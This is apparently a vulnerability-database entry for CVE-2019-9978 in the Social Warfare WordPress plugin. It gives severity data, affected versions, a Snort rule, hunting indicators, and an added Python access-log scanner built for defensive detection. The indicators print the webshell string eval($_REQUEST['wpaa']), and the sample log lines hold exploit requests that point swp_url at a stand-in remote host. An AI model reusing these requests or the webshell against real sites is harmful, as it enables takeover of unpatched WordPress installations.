CVE-2019-9978
published 2019-03-24


Priority: P1 83, medium, 6.1 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 73.54% (99.4th percentile)
The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

Affected

2 ranges

Vendor         | Product            | Version range | Fixed in
warfareplugins | social_warfare     | < 3.5.3       | 3.5.3
warfareplugins | social_warfare_pro | < 3.5.3       | 3.5.3

Detection & IOCs

url: wp-admin/admin-post.php?swp_debug=load_options&swp_url=
path: /wp-admin/admin-post.php
path: /wp-content/plugins/social-warfare/readme.txt
other: Threat Prevention Signature 55424
snort:
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_CLIENT Attempted RCE in Wordpress Social Warfare Plugin Inbound (CVE-2019-9978)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"wp-admin/admin-post.php?swp_debug=load_options&swp_url="; fast_pattern; pcre:"/^https?:\/\//R"; reference:url,www.exploit-db.com/exploits/46794; classtype:attempted-admin; sid:2027315; rev:3; metadata:affected_product Wordpress_Plugins, created_at 2019_05_03, cve CVE_2019_9978, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2020_08_28;)
  • Detect exploitation attempts by monitoring HTTP GET requests to /wp-admin/admin-post.php with both swp_debug=load_options and swp_url= parameters present in the URI.
  • Presence of the Social Warfare plugin can be fingerprinted via the readme.txt file; check for vulnerable versions 3.5.0–3.5.2.
  • The webshell payload dropped by in-the-wild attackers uses eval($_REQUEST['wpaa']); hunt for this string in web server logs and PHP files.
  • FOFA/Shodan fingerprint for exposed vulnerable instances: body contains both 'social-warfare' and 'wp-'.
  • The exploit is unauthenticated — no WordPress login is required to trigger either the RCE or Stored XSS, so authentication-based controls will not block exploitation.
  • Both vulnerabilities (RCE and Stored XSS) are present in Social Warfare versions 3.5.0–3.5.2 only; version 3.5.3 contains the fix.
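
The URI and path indicators above can also be hunted retroactively in web server access logs. The following is an added example, not part of the original page or of any vendor's tooling. It goes slightly beyond the network signature by matching the parameters in any order, after percent-decoding, and for any HTTP method. The "combined" log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed input: Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(target):
    """Label a request target against the IOCs listed on this page, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if path.endswith("/wp-content/plugins/social-warfare/readme.txt"):
        return "readme-fingerprint"      # version probe, low severity
    if not path.endswith("/wp-admin/admin-post.php"):
        return None
    # parse_qs percent-decodes, so encoded or reordered parameters still match.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "load_options" not in (v.lower() for v in qs.get("swp_debug", [])):
        return None
    if "swp_url" not in qs:
        return None
    remote = any(re.match(r"https?://", v, re.I) for v in qs["swp_url"])
    return "swp_url-remote" if remote else "swp_url-present"

def scan(lines):
    """Return (ip, timestamp, status, label) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify(m["target"])):
            hits.append((m["ip"], m["ts"], int(m["status"]), label))
    return hits

# Constructed sample lines (documentation IP ranges, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Mar/2019:10:01:02 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://files.example.invalid/a.txt HTTP/1.1" 200 512 "-" "curl/7.58.0"',
    '198.51.100.4 - - [22/Mar/2019:10:02:10 +0000] "GET /wp-admin/admin-post.php?swp_url=https%3A%2F%2Ffiles.example.invalid%2Fa.txt&swp_debug=load_options HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.15 - - [22/Mar/2019:10:03:00 +0000] "POST /wp-admin/admin-post.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [22/Mar/2019:10:04:00 +0000] "GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "swp_url-remote" hit with a 200 status on a host running a version before 3.5.3 is the case to triage first; "readme-fingerprint" alone only indicates version probing.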

CVSS provenance

Source    | Version | Score | Severity | Vector
nvd       | v3.1    | 6.1   | MEDIUM   | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvd       | v2.0    | 4.3   | MEDIUM   | AV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck |         | 6.1   | MEDIUM   |
cisa      |         | 6.1   | MEDIUM   |